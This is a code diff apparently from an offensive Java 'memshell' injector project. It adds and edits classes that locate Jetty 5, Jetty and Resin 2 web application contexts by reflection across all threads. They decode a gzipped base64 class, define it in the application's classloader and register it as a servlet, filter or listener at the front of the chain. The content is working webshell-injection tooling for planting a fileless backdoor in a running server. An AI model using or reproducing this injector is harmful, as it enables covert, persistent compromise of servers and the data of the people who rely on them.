} catch (Throwable e) {
|
||||
msg += "failed " + getErrorMessage(e) + "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getContextRoot(Object context) {
|
||||
String r = null;
|
||||
try {
|
||||
r = (String) invokeMethod(context, "getContextPath");
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
String c = context.getClass().getName();
|
||||
if (r == null) {
|
||||
return c;
|
||||
}
|
||||
if (r.isEmpty()) {
|
||||
return c + "(/)";
|
||||
}
|
||||
return c + "(" + r + ")";
|
||||
}
|
||||
|
||||
public void inject(Object context, Object listener) throws Exception {
|
||||
if (hasListener(context)) {
|
||||
return;
|
||||
}
|
||||
|
||||
Object webApplicationHandler = getWebApplicationHandler(context);
|
||||
try {
|
||||
invokeMethod(context, "addEventListener", new Class[]{EventListener.class}, new Object[]{listener});
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
|
||||
if (!hasWebApplicationHandlerListener(webApplicationHandler)) {
|
||||
invokeMethod(webApplicationHandler, "addEventListener", new Class[]{EventListener.class}, new Object[]{listener});
|
||||
}
|
||||
ensureJsr154Filter(webApplicationHandler);
|
||||
syncJsr154Filter(webApplicationHandler);
|
||||
}
|
||||
|
||||
@Override
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
/**
|
||||
* org.mortbay.jetty.servlet.WebApplicationContext
|
||||
*/
|
||||
public Set<Object> getContext() throws Exception {
|
||||
Set<Object> contexts = new HashSet<Object>();
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
try {
|
||||
Object contextClassLoader = invokeMethod(thread, "getContextClassLoader");
|
||||
String name = contextClassLoader.getClass().getName();
|
||||
if (name.endsWith("ContextLoader")) {
|
||||
contexts.add(getFieldValue(contextClassLoader, "_context"));
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader"));
|
||||
} catch (Exception e) {
|
||||
return ((ClassLoader) getFieldValue(context, "_classLoader"));
|
||||
}
|
||||
}
|
||||
|
||||
public Object getWebApplicationHandler(Object context) throws Exception {
|
||||
try {
|
||||
Object webApplicationHandler = invokeMethod(context, "getWebApplicationHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
try {
|
||||
Object webApplicationHandler = getFieldValue(context, "_webAppHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
return getFieldValue(context, "_servletHandler");
|
||||
}
|
||||
|
||||
private boolean hasListener(Object context) throws Exception {
|
||||
if (containsListener(getFieldValueQuietly(context, "_contextListeners"))) {
|
||||
return true;
|
||||
}
|
||||
|
||||
Object webApplicationHandler = getWebApplicationHandler(context);
|
||||
return hasWebApplicationHandlerListener(webApplicationHandler);
|
||||
}
|
||||
|
||||
private boolean hasWebApplicationHandlerListener(Object webApplicationHandler) {
|
||||
if (containsListener(getFieldValueQuietly(webApplicationHandler, "_requestListeners"))) {
|
||||
return true;
|
||||
}
|
||||
if (containsListener(getFieldValueQuietly(webApplicationHandler, "_requestAttributeListeners"))) {
|
||||
return true;
|
||||
}
|
||||
if (containsListener(getFieldValueQuietly(webApplicationHandler, "_sessionListeners"))) {
|
||||
return true;
|
||||
}
|
||||
return containsListener(getFieldValueQuietly(webApplicationHandler, "_contextAttributeListeners"));
|
||||
}
|
||||
|
||||
private Object getFieldValueQuietly(Object obj, String name) {
|
||||
try {
|
||||
return getFieldValue(obj, name);
|
||||
} catch (Throwable ignored) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
private boolean containsListener(Object listeners) {
|
||||
if (listeners == null) {
|
||||
return false;
|
||||
}
|
||||
if (listeners instanceof List) {
|
||||
List list = (List) listeners;
|
||||
for (int i = 0; i < list.size(); i++) {
|
||||
if (isInjectedListener(list.get(i))) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
if (listeners.getClass().isArray()) {
|
||||
int length = Array.getLength(listeners);
|
||||
for (int i = 0; i < length; i++) {
|
||||
if (isInjectedListener(Array.get(listeners, i))) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
return isInjectedListener(listeners);
|
||||
}
|
||||
|
||||
private boolean isInjectedListener(Object listener) {
|
||||
return listener != null && listener.getClass().getName().contains(getClassName());
|
||||
}
|
||||
|
||||
private void ensureJsr154Filter(Object webApplicationHandler) {
|
||||
try {
|
||||
Object filterHolder = invokeMethod(webApplicationHandler, "getFilter", new Class[]{String.class}, new Object[]{"jsr154"});
|
||||
if (filterHolder == null) {
|
||||
filterHolder = invokeMethod(webApplicationHandler,
|
||||
"defineFilter",
|
||||
new Class[]{String.class, String.class},
|
||||
new Object[]{"jsr154", "org.mortbay.jetty.servlet.JSR154Filter"});
|
||||
}
|
||||
if (invokeMethod(filterHolder, "getFilter") == null) {
|
||||
invokeMethod(filterHolder, "start");
|
||||
}
|
||||
Object jsr154Filter = invokeMethod(filterHolder, "getFilter");
|
||||
setFieldValue(webApplicationHandler, "jsr154FilterHolder", filterHolder);
|
||||
setFieldValue(webApplicationHandler, "jsr154Filter", jsr154Filter);
|
||||
try {
|
||||
invokeMethod(jsr154Filter, "setUnwrappedDispatchSupported", new Class[]{boolean.class}, new Object[]{Boolean.TRUE});
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
if (!hasPathFilterMapping(webApplicationHandler, "jsr154")) {
|
||||
invokeMethod(webApplicationHandler,
|
||||
"addFilterPathMapping",
|
||||
new Class[]{String.class, String.class, int.class},
|
||||
new Object[]{"/*", "jsr154", Integer.valueOf(1)});
|
||||
}
|
||||
movePathFilterToFront(webApplicationHandler, "jsr154");
|
||||
clearChainCache(webApplicationHandler);
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
private void syncJsr154Filter(Object webApplicationHandler) {
|
||||
try {
|
||||
Object jsr154Filter = getFieldValueQuietly(webApplicationHandler, "jsr154Filter");
|
||||
if (jsr154Filter == null) {
|
||||
Object jsr154FilterHolder = getFieldValueQuietly(webApplicationHandler, "jsr154FilterHolder");
|
||||
if (jsr154FilterHolder != null) {
|
||||
jsr154Filter = invokeMethod(jsr154FilterHolder, "getFilter");
|
||||
}
|
||||
}
|
||||
if (jsr154Filter == null) {
|
||||
return;
|
||||
}
|
||||
invokeMethod(jsr154Filter, "setRequestListeners", new Class[]{Object.class}, new Object[]{getFieldValueQuietly(webApplicationHandler, "_requestListeners")});
|
||||
invokeMethod(jsr154Filter, "setRequestAttributeListeners", new Class[]{Object.class}, new Object[]{getFieldValueQuietly(webApplicationHandler, "_requestAttributeListeners")});
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
private boolean hasPathFilterMapping(Object webApplicationHandler, String filterName) {
|
||||
try {
|
||||
List pathFilters = (List) getFieldValue(webApplicationHandler, "_pathFilters");
|
||||
if (pathFilters == null) {
|
||||
return false;
|
||||
}
|
||||
for (int i = 0; i < pathFilters.size(); i++) {
|
||||
Object filterMapping = pathFilters.get(i);
|
||||
Object filterHolder = invokeMethod(filterMapping, "getHolder");
|
||||
String name = (String) invokeMethod(filterHolder, "getName");
|
||||
if (filterName.equals(name)) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
private void movePathFilterToFront(Object webApplicationHandler, String filterName) {
|
||||
try {
|
||||
List pathFilters = (List) getFieldValue(webApplicationHandler, "_pathFilters");
|
||||
if (pathFilters == null || pathFilters.size() < 2) {
|
||||
return;
|
||||
}
|
||||
for (int i = 0; i < pathFilters.size(); i++) {
|
||||
Object filterMapping = pathFilters.get(i);
|
||||
Object filterHolder = invokeMethod(filterMapping, "getHolder");
|
||||
String name = (String) invokeMethod(filterHolder, "getName");
|
||||
if (filterName.equals(name)) {
|
||||
pathFilters.remove(i);
|
||||
pathFilters.add(0, filterMapping);
|
||||
return;
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
private void clearChainCache(Object webApplicationHandler) {
|
||||
clearCacheField(webApplicationHandler, "_chainCache");
|
||||
clearCacheField(webApplicationHandler, "_namedChainCache");
|
||||
}
|
||||
|
||||
private void clearCacheField(Object object, String name) {
|
||||
try {
|
||||
Object cache = getFieldValue(object, name);
|
||||
if (cache instanceof Map[]) {
|
||||
Map[] maps = (Map[]) cache;
|
||||
for (int i = 0; i < maps.length; i++) {
|
||||
if (maps[i] != null) {
|
||||
maps[i].clear();
|
||||
}
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Object getShell(Object context) throws Exception {
|
||||
ClassLoader classLoader = getWebAppClassLoader(context);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz.newInstance();
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object getFieldValue(Object obj, String name) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
return field.get(obj);
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
public static void setFieldValue(Object obj, String name, Object value) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
field.set(obj, value);
|
||||
return;
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
public static Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
|
||||
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws NoSuchMethodException {
|
||||
try {
|
||||
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
|
||||
Method method = null;
|
||||
while (clazz != null && method == null) {
|
||||
try {
|
||||
if (paramClazz == null) {
|
||||
method = clazz.getDeclaredMethod(methodName);
|
||||
} else {
|
||||
method = clazz.getDeclaredMethod(methodName, paramClazz);
|
||||
}
|
||||
} catch (NoSuchMethodException e) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
if (method == null) {
|
||||
throw new NoSuchMethodException("Method not found: " + methodName);
|
||||
}
|
||||
method.setAccessible(true);
|
||||
return method.invoke(obj instanceof Class ? null : obj, param);
|
||||
} catch (NoSuchMethodException e) {
|
||||
throw e;
|
||||
} catch (Exception e) {
|
||||
throw new RuntimeException("Error invoking method: " + methodName, e);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
-254
@@ -1,254 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.jetty;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.InvocationTargetException;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.HashSet;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/7/4
|
||||
*/
|
||||
public class Jetty5ServletInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() throws IOException {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Jetty5ServletInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Set<Object> contexts = null;
|
||||
try {
|
||||
contexts = getContext();
|
||||
} catch (Throwable throwable) {
|
||||
msg += "context error: " + getErrorMessage(throwable);
|
||||
}
|
||||
if (contexts == null || contexts.isEmpty()) {
|
||||
msg += "context not found";
|
||||
} else {
|
||||
for (Object context : contexts) {
|
||||
try {
|
||||
msg += ("context: [" + getContextRoot(context) + "] ");
|
||||
Object shell = getShell(context);
|
||||
inject(context, shell);
|
||||
msg += "[" + getUrlPattern() + "] ready\n";
|
||||
} catch (Throwable e) {
|
||||
msg += "failed " + getErrorMessage(e) + "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getContextRoot(Object context) {
|
||||
String r = null;
|
||||
try {
|
||||
r = (String) invokeMethod(context, "getContextPath");
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
String c = context.getClass().getName();
|
||||
if (r == null) {
|
||||
return c;
|
||||
}
|
||||
if (r.isEmpty()) {
|
||||
return c + "(/)";
|
||||
}
|
||||
return c + "(" + r + ")";
|
||||
}
|
||||
|
||||
public void inject(Object context, Object servlet) throws Exception {
|
||||
Object servletHandler = getWebApplicationHandler(context);
|
||||
|
||||
if (invokeMethod(servletHandler, "getServletHolder", new Class[]{String.class}, new Object[]{getClassName()}) != null) {
|
||||
return;
|
||||
}
|
||||
|
||||
invokeMethod(
|
||||
servletHandler,
|
||||
"addServlet",
|
||||
new Class[]{String.class, String.class, String.class},
|
||||
new Object[]{getClassName(), getUrlPattern(), getClassName()});
|
||||
}
|
||||
|
||||
@Override
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
/**
|
||||
* org.mortbay.jetty.servlet.WebApplicationContext
|
||||
*/
|
||||
public Set<Object> getContext() throws Exception {
|
||||
Set<Object> contexts = new HashSet<Object>();
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
try {
|
||||
Object contextClassLoader = invokeMethod(thread, "getContextClassLoader");
|
||||
String name = contextClassLoader.getClass().getName();
|
||||
if (name.endsWith("ContextLoader")) {
|
||||
contexts.add(getFieldValue(contextClassLoader, "_context"));
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader"));
|
||||
} catch (Exception e) {
|
||||
return ((ClassLoader) getFieldValue(context, "_classLoader"));
|
||||
}
|
||||
}
|
||||
|
||||
public Object getWebApplicationHandler(Object context) throws Exception {
|
||||
try {
|
||||
Object webApplicationHandler = invokeMethod(context, "getWebApplicationHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
try {
|
||||
Object webApplicationHandler = getFieldValue(context, "_webAppHandler");
|
||||
if (webApplicationHandler != null) {
|
||||
return webApplicationHandler;
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
return getFieldValue(context, "_servletHandler");
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Object getShell(Object context) throws Exception {
|
||||
ClassLoader classLoader = getWebAppClassLoader(context);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz.newInstance();
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object getFieldValue(Object obj, String name) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
return field.get(obj);
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
public static Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
|
||||
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws NoSuchMethodException {
|
||||
try {
|
||||
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
|
||||
Method method = null;
|
||||
while (clazz != null && method == null) {
|
||||
try {
|
||||
if (paramClazz == null) {
|
||||
method = clazz.getDeclaredMethod(methodName);
|
||||
} else {
|
||||
method = clazz.getDeclaredMethod(methodName, paramClazz);
|
||||
}
|
||||
} catch (NoSuchMethodException e) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
if (method == null) {
|
||||
throw new NoSuchMethodException("Method not found: " + methodName);
|
||||
}
|
||||
method.setAccessible(true);
|
||||
return method.invoke(obj instanceof Class ? null : obj, param);
|
||||
} catch (NoSuchMethodException e) {
|
||||
throw e;
|
||||
} catch (Exception e) {
|
||||
throw new RuntimeException("Error invoking method: " + methodName, e);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
+1
-24
@@ -6,7 +6,6 @@ import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.*;
|
||||
import java.util.HashSet;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
@@ -131,16 +130,7 @@ public class JettyFilterInjector {
|
||||
}
|
||||
newMappings[0] = filterMapping;
|
||||
invokeMethod(servletHandler, "setFilterMappings", new Class[]{Array.newInstance(filterMappingClass, 0).getClass()}, new Object[]{newMappings});
|
||||
try {
|
||||
invokeMethod(servletHandler, "invalidateChainsCache");
|
||||
} catch (NoSuchMethodException e) {
|
||||
Map[] _chainCache = (Map[]) getFieldValue(servletHandler, "_chainCache");
|
||||
if (_chainCache != null) {
|
||||
for (Map cache : _chainCache) {
|
||||
if (cache != null) cache.clear();
|
||||
}
|
||||
}
|
||||
}
|
||||
invokeMethod(servletHandler, "invalidateChainsCache");
|
||||
}
|
||||
|
||||
@Override
|
||||
@@ -181,19 +171,6 @@ public class JettyFilterInjector {
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
|
||||
// Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
|
||||
try {
|
||||
Object target = getFieldValue(thread, "target");
|
||||
if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
|
||||
Map hostConfigs = (Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
|
||||
for (Object o : hostConfigs.values()) {
|
||||
Map apps = (Map) getFieldValue(o, "webapps");
|
||||
contexts.addAll(apps.values());
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
+1
-2
@@ -110,8 +110,7 @@ public class JettyHandlerInjector {
|
||||
if (entry != null) {
|
||||
Object threadLocalValue = getFieldValue(entry, "value");
|
||||
if (threadLocalValue != null) {
|
||||
if (threadLocalValue.getClass().getName().contains("HttpConnection")
|
||||
|| threadLocalValue.getClass().getName().contains("SelectChannelConnector")) {
|
||||
if (threadLocalValue.getClass().getName().contains("HttpConnection")) {
|
||||
return invokeMethod(invokeMethod(threadLocalValue, "getConnector"), "getServer");
|
||||
}
|
||||
}
|
||||
|
||||
+4
-14
@@ -8,7 +8,10 @@ import java.lang.reflect.Array;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.InvocationTargetException;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.*;
|
||||
import java.util.EventListener;
|
||||
import java.util.HashSet;
|
||||
import java.util.List;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
@@ -98,19 +101,6 @@ public class JettyListenerInjector {
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
|
||||
// Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
|
||||
try {
|
||||
Object target = getFieldValue(thread, "target");
|
||||
if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
|
||||
Map hostConfigs = (Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
|
||||
for (Object o : hostConfigs.values()) {
|
||||
Map apps = (Map) getFieldValue(o, "webapps");
|
||||
contexts.addAll(apps.values());
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
-15
@@ -6,7 +6,6 @@ import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.*;
|
||||
import java.util.HashSet;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
@@ -110,20 +109,6 @@ public class JettyServletInjector {
|
||||
}
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
|
||||
// Winstone-Jetty: Launcher -> HostGroup -> HostConfigs -> webapps
|
||||
try {
|
||||
Object target = getFieldValue(thread, "target");
|
||||
if (target != null && target.getClass().getName().contains("winstone.Launcher")) {
|
||||
Map hostConfigs = (Map) getFieldValue(getFieldValue(target, "hostGroup"), "hostConfigs");
|
||||
for (Object o : hostConfigs.values()) {
|
||||
Map apps = (Map) getFieldValue(o, "webapps");
|
||||
contexts.addAll(apps.values());
|
||||
}
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
-270
@@ -1,270 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.resin2;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.HashSet;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/7/4
|
||||
*/
|
||||
public class Resin2FilterInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() throws IOException {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Resin2FilterInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Set<Object> contexts = null;
|
||||
try {
|
||||
contexts = getContext();
|
||||
} catch (Throwable throwable) {
|
||||
msg += "context error: " + getErrorMessage(throwable);
|
||||
}
|
||||
if (contexts == null || contexts.isEmpty()) {
|
||||
msg += "context not found";
|
||||
} else {
|
||||
for (Object context : contexts) {
|
||||
try {
|
||||
msg += ("context: [" + getContextRoot(context) + "] ");
|
||||
Object shell = getShell(context);
|
||||
inject(context, shell);
|
||||
msg += "[" + getUrlPattern() + "] ready\n";
|
||||
} catch (Throwable e) {
|
||||
msg += "failed " + getErrorMessage(e) + "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getContextRoot(Object context) {
|
||||
String r = null;
|
||||
try {
|
||||
r = (String) invokeMethod(context, "getContextPath", null, null);
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
String c = context.getClass().getName();
|
||||
if (r == null) {
|
||||
return c;
|
||||
}
|
||||
if (r.isEmpty()) {
|
||||
return c + "(/)";
|
||||
}
|
||||
return c + "(" + r + ")";
|
||||
}
|
||||
|
||||
public Set<Object> getContext() throws Exception {
|
||||
Set<Object> contexts = new HashSet<Object>();
|
||||
addContextFromClassLoader(contexts, Thread.currentThread().getContextClassLoader());
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
try {
|
||||
addContextFromClassLoader(contexts, thread.getContextClassLoader());
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
private void addContextFromClassLoader(Set<Object> contexts, ClassLoader classLoader) {
|
||||
Object context = getApplicationFromClassLoader(classLoader);
|
||||
if (context != null) {
|
||||
contexts.add(context);
|
||||
}
|
||||
}
